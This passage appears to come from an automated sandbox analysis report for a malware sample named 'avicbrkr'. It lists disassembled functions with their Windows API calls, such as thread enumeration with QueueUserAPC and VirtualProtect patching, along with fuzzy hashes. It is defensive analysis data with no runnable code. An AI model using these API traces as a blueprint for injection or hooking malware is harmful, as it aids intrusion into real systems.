                        • Part of subcall function 003775E0: CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                        • Part of subcall function 003775E0: GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                        • Part of subcall function 003775E0: CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                        • Part of subcall function 003775E0: lstrlen.KERNEL32(?), ref: 00377669
                        • Part of subcall function 003775E0: lstrcpy.KERNEL32(?,?), ref: 00377679
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 00377681
                        • Part of subcall function 003775E0: HeapFree.KERNEL32(00000000,?), ref: 00377694
                        • Part of subcall function 003775E0: CloseHandle.KERNEL32(?), ref: 003776A6
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 003776AE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$CloseHandleMappingWaitlstrlen$CountFreeHeapNamedObjectOpenPipeSingleSizeTicklstrcpymemset
                      • String ID:
                      • API String ID: 3418506136-0
                      • Opcode ID: ae2060190c8fd6d13d3523b06ab3ec329ee6373825baaf8875acaea69c511a7c
                      • Instruction ID: 6fcc3b40d1892e35f0562eb7aab42efe4028e9b0bddeadaa6382bbbb42f90ad2
                      • Opcode Fuzzy Hash: ae2060190c8fd6d13d3523b06ab3ec329ee6373825baaf8875acaea69c511a7c
                      • Instruction Fuzzy Hash: AA217771900209EBDF32DF65CC44EEEBBF8EF45364F104626F918A61A0E7358945CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377905, Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00377955
                      • GetLastError.KERNEL32(?,00000000,00377C1F), ref: 00377986
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377998
                      • HeapFree.KERNEL32(00000000,00377C1F), ref: 003779AD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$AllocateErrorLast
                      • String ID:
                      • API String ID: 3560806655-0
                      • Opcode ID: 0329f42de0b2e8e07b165425193d429401acddd9a824989d7ecb4f4f52dcc60c
                      • Instruction ID: 6eaec15b56b50dea811d199e1332a1fd203cfc3d743504c31c6c86302114aea2
                      • Opcode Fuzzy Hash: 0329f42de0b2e8e07b165425193d429401acddd9a824989d7ecb4f4f52dcc60c
                      • Instruction Fuzzy Hash: A2117F76506128BBCB236B95DC49CEFBF7EEF46390F114062F609E2160D7364A51EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B703, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(0039E88E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B742
                        • Part of subcall function 00376361: RtlImageNtHeader.NTDLL(?), ref: 00376376
                        • Part of subcall function 00376361: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,0037D9D1,0037D9D1,00000000,?,0037D9D1,00000001,00000000,?,0037D9D1,?,0000005C), ref: 0037643C
                        • Part of subcall function 003723D9: GetCommandLineW.KERNEL32(00000000,5AFF7C2A,5AFF7C2A,00000001,0037B75E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 003723E1
                        • Part of subcall function 003723D9: ExitProcess.KERNEL32 ref: 00372454
                      • CreateThread.KERNEL32(00000000,00000000,00376E94,00000000,00000000,?), ref: 0037B777
                      • CloseHandle.KERNEL32(00000000), ref: 0037B782
                      • GetLastError.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0037B78A
                        • Part of subcall function 00376490: GetModuleHandleA.KERNEL32(0039E065,00000000,0037B7B6,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC), ref: 00376496
                        • Part of subcall function 00376490: TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003764A2
                        • Part of subcall function 0037B652: CreateToolhelp32Snapshot.KERNEL32 ref: 0037B684
                        • Part of subcall function 0037B652: GetModuleHandleA.KERNEL32(0039E01D,0039F030,00000004,00000000,00000000,00000000,00000000), ref: 0037B69B
                        • Part of subcall function 0037B652: GetProcAddress.KERNEL32(00000000), ref: 0037B6A2
                        • Part of subcall function 0037B652: Thread32First.KERNEL32(?,0000001C), ref: 0037B6B2
                        • Part of subcall function 0037B652: OpenThread.KERNEL32(001F03FF,00000000,00000000,?,0000001C), ref: 0037B6CD
                        • Part of subcall function 0037B652: QueueUserAPC.KERNEL32(0000005C,00000000,00000000), ref: 0037B6DE
                        • Part of subcall function 0037B652: Thread32Next.KERNEL32(?,0000001C), ref: 0037B6EE
                        • Part of subcall function 003784DB: TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003784F0
                        • Part of subcall function 003784DB: ___HrLoadAllImportsForDll@4.DELAYIMP ref: 00378538
                        • Part of subcall function 003749A8: memcpy.NTDLL(0039C06C,0000005C,00000028,00000000,0039E1BF,0000005C,?,?,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 003749DA
                        • Part of subcall function 003749A8: HeapFree.KERNEL32(00000000,0000005C,0039E1BF), ref: 00374A0B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Handle$AllocModule$CreateThreadThread32$AddressCloseCommandDll@4ErrorExitFirstFreeHeaderHeapImageImportsLastLineLoadNextOpenProcProcessQueueSnapshotToolhelp32UserVirtualmemcpy
                      • String ID:
                      • API String ID: 638187754-0
                      • Opcode ID: 7d14e363c15612d00f9e1c1fd4ddf3022e6af2041e3732337ba08b9dba8228fd
                      • Instruction ID: 6e2e2487aca69973f0b781675c749492158d1d1d4e537de8ca1cc3a82b9f0ad1
                      • Opcode Fuzzy Hash: 7d14e363c15612d00f9e1c1fd4ddf3022e6af2041e3732337ba08b9dba8228fd
                      • Instruction Fuzzy Hash: 94119860104690A5C63F33698CCDB7FD5BC9EC0F91725C90EF44EE6960D71D58419663
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063139A, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73memoryCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 006313BA
                      • GetLastError.KERNEL32 ref: 00631429
                      • HeapFree.KERNEL32(00000000,?), ref: 0063143B
                        • Part of subcall function 0063225F: memset.NTDLL ref: 00632282
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                        • Part of subcall function 0063225F: WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                        • Part of subcall function 0063225F: SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 0063225F: GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?), ref: 006323A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$ErrorLastResumememset$FreeHeapObjectSingleSuspendWait
                      • String ID: D
                      • API String ID: 3474720918-2746444292
                      • Opcode ID: dafe71e294a75c4d87a693e973aeb654311a8de92ad6ccef93490f9838a1a38f
                      • Instruction ID: 4ab3a51d91ddf370173d67ac8527c796d331834319adbf2169456b66bf3e4bb5
                      • Opcode Fuzzy Hash: dafe71e294a75c4d87a693e973aeb654311a8de92ad6ccef93490f9838a1a38f
                      • Instruction Fuzzy Hash: 7C118472901228BFCB11ABE4DC46DDFBFBAEF4A754F104021F604A6121D7715A45CBE1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003887AA, Relevance: 6.1, APIs: 4, Instructions: 72fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003891B4: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891DA
                        • Part of subcall function 003891B4: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891E2
                        • Part of subcall function 003891B4: GetLastError.KERNEL32(?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 00389220
                        • Part of subcall function 0038A2FC: lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                        • Part of subcall function 0038A2FC: lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003887FE
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0038D17F,?,?,00000000), ref: 00388810
                      • ReadFile.KERNEL32(0038D17F,00000000,00000004,?,00000000), ref: 00388828
                      • CloseHandle.KERNEL32(0038D17F), ref: 00388843
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: f88d962e12679c189d829964f2dff19ecba32c5d2b708e0080dfd51e09f2243c
                      • Instruction ID: 25e5ed5fe1f011d5f7269f13e2045d8db6495d9ea8236464e701be104ca7da35
                      • Opcode Fuzzy Hash: f88d962e12679c189d829964f2dff19ecba32c5d2b708e0080dfd51e09f2243c
                      • Instruction Fuzzy Hash: 42118E72600218BBDB22BB65CC89EAFBE6DEF01750F5044A2F905E61A1D7718E40C7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633271, Relevance: 6.1, APIs: 4, Instructions: 71fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00633B94: GetModuleFileNameW.KERNEL32(00637614,00000000,00000104,00000208,0063618C,0000000C,?,?,00632A29,?,00000001,0063618C,0000000C,00000000), ref: 00633BBA
                        • Part of subcall function 00633B94: GetModuleFileNameA.KERNEL32(00637614,00000000,00000104,00000208,0063618C,0000000C,?,?,00632A29,?,00000001,0063618C,0000000C,00000000), ref: 00633BC2
                        • Part of subcall function 00633B94: GetLastError.KERNEL32(?,?,00632A29,?,00000001,0063618C,0000000C,00000000,?,?,?,00631746), ref: 00633C00
                        • Part of subcall function 006347D2: lstrcmp.KERNEL32(?,00637614), ref: 00634882
                        • Part of subcall function 006347D2: lstrlen.KERNEL32(?,00000000,00000000,006317CE), ref: 0063488D
                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006332C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00631B26,00638451), ref: 006332D6
                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 006332EE
                      • CloseHandle.KERNEL32(?), ref: 00633309
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: a9f00e634837e10115710bf9651e0de113135c8e96d29ca3789ef022cb93e9b5
                      • Instruction ID: 18cc42201472de713f0db4ef59ab70248d05960383802d35c4652be45d0678b7
                      • Opcode Fuzzy Hash: a9f00e634837e10115710bf9651e0de113135c8e96d29ca3789ef022cb93e9b5
                      • Instruction Fuzzy Hash: D9116371A01128BBEB20AB65CD49EEFBE7EEF42750F108025F506E5265D7319F50C6E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372A11, Relevance: 6.1, APIs: 4, Instructions: 68registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 00372A2B
                        • Part of subcall function 00389EF2: RegCloseKey.ADVAPI32(?,00000000), ref: 00389F79
                      • lstrcmpiW.KERNEL32(00001000,?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A61
                      • lstrlenW.KERNEL32(?,?,00001000,00000000,00000000,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000), ref: 00372A6E
                      • RegCloseKey.ADVAPI32(?,?,00372C4F,?,00000001,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372AC4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Close$Openlstrcmpilstrlen
                      • String ID:
                      • API String ID: 1246463283-0
                      • Opcode ID: ffb935db6ea6c051b1d0eca01df2d2fbc916f721d8cbb48f9e318c3022d213b9
                      • Instruction ID: 43944a72a08fc32299ba6bd0ca282d9ff22340611aa5343a996786b7d1d33056
                      • Opcode Fuzzy Hash: ffb935db6ea6c051b1d0eca01df2d2fbc916f721d8cbb48f9e318c3022d213b9
                      • Instruction Fuzzy Hash: EA210A35610118FFCB23AF95EC8ACAE7F7DEB08750F154466F909A2220D7765E90DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387B93, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,?,?,?,0037B5E2), ref: 00387BCB
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrcpy.KERNEL32(00000000,?), ref: 00387BE2
                      • StrChrA.SHLWAPI(00000000,0000002E), ref: 00387BEB
                      • GetModuleHandleA.KERNEL32(00000000,?,0037B5E2), ref: 00387C09
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,0038819A,00399540,0000001C,00387E1E,00000002,00000000,00000001,00000000,?,00000000), ref: 00387C9C
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000), ref: 00387D05
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,0038819A,00000000,?,?), ref: 00387D39
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000), ref: 00387D50
                        • Part of subcall function 00387C56: RtlEnterCriticalSection.NTDLL(H}*), ref: 00387D71
                        • Part of subcall function 00387C56: RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387D8F
                        • Part of subcall function 00387C56: GetLastError.KERNEL32(?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00387DB7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$CriticalHeapSection$AllocateEnterErrorFreeHandleLastLeaveModulelstrcpylstrlen
                      • String ID:
                      • API String ID: 4024945899-0
                      • Opcode ID: 09831e11e448beac7bc681bc3cc70f2f50b5242fca67b74c79e8aae9709c20c7
                      • Instruction ID: 5a57dd4cc19157b3a08b6152e70c55c2015aee05eddc82ab509b48379d364d04
                      • Opcode Fuzzy Hash: 09831e11e448beac7bc681bc3cc70f2f50b5242fca67b74c79e8aae9709c20c7
                      • Instruction Fuzzy Hash: FF214F70904309DFCB26EF68CD48AAEBBBABF55300F258099E406AB361D774DA41CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003915BE, Relevance: 6.1, APIs: 4, Instructions: 66stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(00000000,00000000,003970EC,003970C0,?,?,?,00391753,?,00000000,?), ref: 003915CE
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,00391753,?,00000000,?), ref: 003915F0
                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 0039161C
                      • lstrcatW.KERNEL32(00000000,0039FA5C), ref: 00391628
                        • Part of subcall function 003913CB: strstr.NTDLL ref: 003914CB
                        • Part of subcall function 003913CB: StrChrA.SHLWAPI(?,00000040), ref: 003914F4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateByteCharFreeMultiWidelstrcatlstrcpylstrlenstrstr
                      • String ID:
                      • API String ID: 3820859035-0
                      • Opcode ID: 78cc966e46d51193608b58f0224d20ff60b9df3406655c71510e831a866f1449
                      • Instruction ID: b158b447411ce7d9d75e0ce95d262c2abc16c08c54bbe5cb992ca5be14f6cd26
                      • Opcode Fuzzy Hash: 78cc966e46d51193608b58f0224d20ff60b9df3406655c71510e831a866f1449
                      • Instruction Fuzzy Hash: 3211343250011ABFCF22AFA4CC88C9F7FADEF09390B048425F905AA151D735DA51DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038EB06, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0038ECD3,00000000,?,00000000,0038F1FF,?,0039D47C), ref: 0038EB11
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0038EB29
                      • memcpy.NTDLL(00000000,0039D47C,-00000008,?,?,?,0038ECD3,00000000,?,00000000,0038F1FF,?,0039D47C), ref: 0038EB6D
                      • memcpy.NTDLL(00000001,0039D47C,00000001,0038F1FF,?,0039D47C), ref: 0038EB8E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeaplstrlen
                      • String ID:
                      • API String ID: 1819133394-0
                      • Opcode ID: e5403fc0252522dd998860154e76fdc626808de5b7e4f6ba16608b4d42781acf
                      • Instruction ID: 33f23fb0288b1c883a98fff9f57bf6a3617737e46519c7388b723abb8caa9ab1
                      • Opcode Fuzzy Hash: e5403fc0252522dd998860154e76fdc626808de5b7e4f6ba16608b4d42781acf
                      • Instruction Fuzzy Hash: 5711C272A04214BFD722DB69DC85D9ABBEEEB80360F1501BBF50597290E6759E00C7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038C515, Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON
                      Download Yara Rule
                      APIs
                      • SwitchToThread.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0038C540
                      • memset.NTDLL ref: 0038C575
                      • memset.NTDLL ref: 0038C58C
                      • memset.NTDLL ref: 0038C5A3
                        • Part of subcall function 0038ACED: RtlLeaveCriticalSection.NTDLL(003713EB), ref: 0038AD27
                        • Part of subcall function 0038ACED: HeapFree.KERNEL32(00000000,003713EB), ref: 0038AD36
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$FreeHeap$CriticalLeaveSectionSwitchThread
                      • String ID:
                      • API String ID: 1176524582-0
                      • Opcode ID: 1906bc1fa29d5365b022335d6110f0f50a2222051e75c7d37a2978872c4e0ad7
                      • Instruction ID: 14294f3d0effc905f09d4f332804b3df508446157f01f582f4713f3e8c9a0ee4
                      • Opcode Fuzzy Hash: 1906bc1fa29d5365b022335d6110f0f50a2222051e75c7d37a2978872c4e0ad7
                      • Instruction Fuzzy Hash: 6A11C879D1061067DA13772AAD87C4F3B6DBBC2B02F050167F104A7122C73619068BB6
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387665, Relevance: 6.1, APIs: 4, Instructions: 59stringthreadtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                      • lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentFreeNameSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1991932461-0
                      • Opcode ID: c36961d4d0d53927c1a822c349442e643139b7e964a80536a9e02058f196989a
                      • Instruction ID: 0fd40d0d912c2a1301ebf88ec87e41575e477925a8c28ae94061aeb1b0995017
                      • Opcode Fuzzy Hash: c36961d4d0d53927c1a822c349442e643139b7e964a80536a9e02058f196989a
                      • Instruction Fuzzy Hash: B601F573529B147FDB232BB88CC8D6B3A6DEF00740B254566F901E3241EA75DC0047B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037508F, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?), ref: 0037509C
                      • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 003750C2
                      • lstrcpy.KERNEL32(00000014,?), ref: 003750E7
                      • memcpy.NTDLL(?,?,?), ref: 003750F4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrcpylstrlenmemcpy
                      • String ID:
                      • API String ID: 1388643974-0
                      • Opcode ID: f991ffcfdabe8c91b07bb4cce5e3d35eb3d9bce98bd24f9b9e7f73a6eb23fe0e
                      • Instruction ID: 5de790f801455e93a9b34bdf76f2ca499dc46e555bcbf6219854969232730658
                      • Opcode Fuzzy Hash: f991ffcfdabe8c91b07bb4cce5e3d35eb3d9bce98bd24f9b9e7f73a6eb23fe0e
                      • Instruction Fuzzy Hash: 89114971510609EFCB22CF58D944E9A7BF8FB48704F10855AF84987320D775E914CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003725E7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00372F40,?,00000000), ref: 003725FA
                      • lstrlen.KERNEL32(0039D1D8), ref: 0037261B
                      • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00372633
                      • lstrcpy.KERNEL32(00000000,0039D1D8), ref: 00372645
                        • Part of subcall function 0038762C: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,00372651,00000000), ref: 00387641
                        • Part of subcall function 0038762C: GetLastError.KERNEL32 ref: 0038764B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$AllocateCreateDirectoryErrorFileHeapLastSystemlstrcpylstrlen
                      • String ID:
                      • API String ID: 3262898209-0
                      • Opcode ID: 6f67a27e4459efe2e0aecf80c85e51f4530adf2a526754b1c2a3d2e62e69f70b
                      • Instruction ID: e4e777eded73df5e36d2ee2704af9430825e7c696bfaba535910e1ad23f145a3
                      • Opcode Fuzzy Hash: 6f67a27e4459efe2e0aecf80c85e51f4530adf2a526754b1c2a3d2e62e69f70b
                      • Instruction Fuzzy Hash: F5018476904244ABC7239BA9AC88EAF7BBCAB48301F14406AF909D3341E6799905C764
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372998, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcatW.KERNEL32(?,?), ref: 003729AA
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                      • WaitForSingleObject.KERNEL32(00002710,?), ref: 003729CD
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003729EF
                      • GetLastError.KERNEL32(?,00372BDD,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372A03
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$ObjectSingleWait$CloseCreateHandlePointerWritelstrcat
                      • String ID:
                      • API String ID: 3295507663-0
                      • Opcode ID: 01f4d935485a3c187fa5b9922d0424d4eeb2cea1d5e6badee77280838bb1d769
                      • Instruction ID: b0d37ff95a3680451b16668273fa4f18135513f762a3095cd6f8392386fdbabe
                      • Opcode Fuzzy Hash: 01f4d935485a3c187fa5b9922d0424d4eeb2cea1d5e6badee77280838bb1d769
                      • Instruction Fuzzy Hash: 04F06232254608BBDB335F60AC0AF5B3B2DEF05751F208415FA1AD81E0EB76D9219B69
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006344D4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 39stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(00633038,?,00000000,?,!Cc,00633038,00000000), ref: 006344DD
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • memcpy.NTDLL(00000000,00633038,00000000,00000000,?,?,!Cc,00633038,00000000), ref: 00634507
                      • memset.NTDLL ref: 0063451B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrlenmemcpymemset
                      • String ID: !Cc
                      • API String ID: 3744489918-3374438881
                      • Opcode ID: 23017333b32ea59625e874946afa460f698a67dfecab2d209234e2ef0765e03e
                      • Instruction ID: 41254ebec0181fe5a7a982534e7e64e1b34d4daa4a26a571b35faf1f434017d8
